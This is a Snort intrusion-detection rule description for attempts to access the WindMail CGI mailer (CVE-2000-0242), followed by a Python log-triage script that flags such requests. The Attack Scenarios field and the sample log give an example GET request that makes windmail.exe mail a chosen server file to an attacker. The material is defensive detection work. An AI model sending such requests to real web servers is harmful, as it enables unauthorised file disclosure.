GEN:SID | 1:1158 |
Message | WEB-MISC windmail.exe access |
Summary | This event is generated when an attempt is made to access the executable file WindMail.exe using a web connection.
|
Impact | Remote attackers could subvert the WindMail mailer to read or execute arbitrary files on the web server.
|
Detailed Information | WindMail is a command-line mail program for Windows. It is sometimes deployed for scripting or for sending email through a web application. Some WindMail deployments expose windmail.exe as a CGI application, a role it was not designed for. The result is that an attacker could read or execute arbitrary files on the system that the web server has access to. windmail.exe should never be a CGI application itself; it should instead be called by another program that properly filters input.
|
Affected Systems | All systems using windmail.exe
|
Attack Scenarios | http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address
|
Ease of Attack | Simple crafting of a web GET request
|
Corrective Action | Look at the packet to determine whether a request was made via an HTTP GET for the windmail.exe application. If so, determine whether the attacked web server had windmail.exe on it.
|
Additional References | |
Rule References | arachnids: 465
bugtraq: 1073
cve: 2000-0242
nessus: 10365
|
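The check described under Corrective Action can also be run against web server access logs. The following is an added example, not part of the original rule documentation; it assumes NCSA common log format, and the `triage` function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# NCSA common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def triage(lines):
    """Return one finding per logged request whose URL path ends in windmail.exe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        parts = urlsplit(target)
        # Decode and lowercase the path so WindMail%2Eexe and similar forms match.
        path = unquote(parts.path).lower()
        if not path.endswith("/windmail.exe"):
            continue
        # Decode the query string into the arguments the CGI would have received.
        args = unquote(parts.query).split()
        findings.append({
            "client": client,
            "method": method,
            "status": int(status),
            # A 2xx status suggests windmail.exe exists on the server and was run;
            # a 404 suggests a probe against a server that does not have it.
            "present": 200 <= int(status) < 300,
            # In the Attack Scenarios entry the requested file follows "-n".
            "file_arg": args[args.index("-n") + 1] if "-n" in args[:-1] else None,
            "args": args,
        })
    return findings

# Constructed sample log lines using documentation addresses (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [10/Oct/2000:13:55:36 +0000] "GET /cgi-bin/windmail.exe'
    '?%20-n%20desired.file%20attacker_email_address HTTP/1.0" 200 312',
    '192.0.2.11 - - [10/Oct/2000:13:56:01 +0000] "GET /scripts/WindMail%2Eexe HTTP/1.0" 404 208',
    '192.0.2.12 - - [10/Oct/2000:13:57:12 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A finding with `present` set and a non-empty `file_arg` is the case to escalate: the server answered the request and a file name was passed to the mailer.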